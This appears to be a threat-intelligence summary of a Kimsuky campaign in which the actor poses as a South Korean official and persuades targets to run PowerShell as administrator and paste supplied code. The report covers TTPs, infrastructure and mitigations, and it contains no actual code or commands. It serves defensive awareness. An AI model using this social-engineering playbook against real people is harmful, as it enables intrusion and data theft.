Full Report
The North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets into running PowerShell as an administrator and then instructing them to paste and run malicious code provided by them. "To execute this tactic, the threat actor masquerades as a South Korean government official and over time builds rapport with a target before sending a
Analysis Summary
# Threat Actor: Kimsuky
## Attribution & Identity
* **Attribution:** North Korea-linked threat actor.
* **Known Aliases/Associations:** None explicitly named in relation to the new tactic, but mentioned alongside threat actors involved in the "Contagious Interview" campaign (which uses similar execution methods on macOS).
## Activity Summary
* Observed using a new, socially engineered tactic since January 2025 involving deception to gain direct administrative access.
* The actor masquerades as a South Korean government official to build rapport with targets.
* The final payload involves tricking the victim into opening a link, registering their Windows system, launching PowerShell as an administrator, and copy/pasting malicious code provided by the actor.
* This technique is described as a departure from the actor's usual tradecraft.
## Tactics, Techniques & Procedures
* **Spear-phishing:** Sending emails containing a deceptive PDF attachment.
* **Social Engineering:** Building rapport with the target over time.
* **Execution via User Action:** Persuading victims to click an embedded URL instructing them to run PowerShell with administrative privileges.
* **T1059.001 (Command and Scripting Interpreter: PowerShell):** Execution of malicious code via pasted commands.
* **Data Staging/Exfiltration:** Installing a browser-based remote desktop tool and registering the device using a downloaded certificate and hardcoded PIN.
* **General Tactic:** This approach relies on targets infecting their own machines, bypassing standard security protections.
## Targeting
* **Sectors:** Not explicitly detailed for this specific campaign, but implied government/official sector given the initial masquerade.
* **Geography:** Implied South Korea (based on the masquerade). Limited attacks observed globally or in target regions where rapport building is feasible.
* **Victims:** Undisclosed targets who interact with entities masquerading as South Korean government officials.
## Tools & Infrastructure
* **Malware Families Used:** A browser-based remote desktop tool.
* **Infrastructure:** Remote servers used to host the malicious code, the certificate file (with a hardcoded PIN), and receive communications for device registration.
## Implications
The adoption of user-assisted command execution (bypassing sandbox/AV checks) represents an evolving and potentially high-impact TTP for Kimsuky. While observed in limited attacks, success in compromising targets this way yields direct RDP access, facilitating immediate data exfiltration. This trend of relying on user consent for execution is becoming more prevalent among threat actors.
## Mitigations
* Increased scrutiny of unsolicited requests, especially those requiring administrative credentials or PowerShell execution via web links.
* User training focused on rapport-building social engineering tactics used by state-sponsored actors (e.g., posing as officials).
* Monitoring for the installation of unauthorized remote desktop tools post-user execution.
* Reviewing endpoint security policies regarding automatic execution of code pasted into elevated command-line interfaces.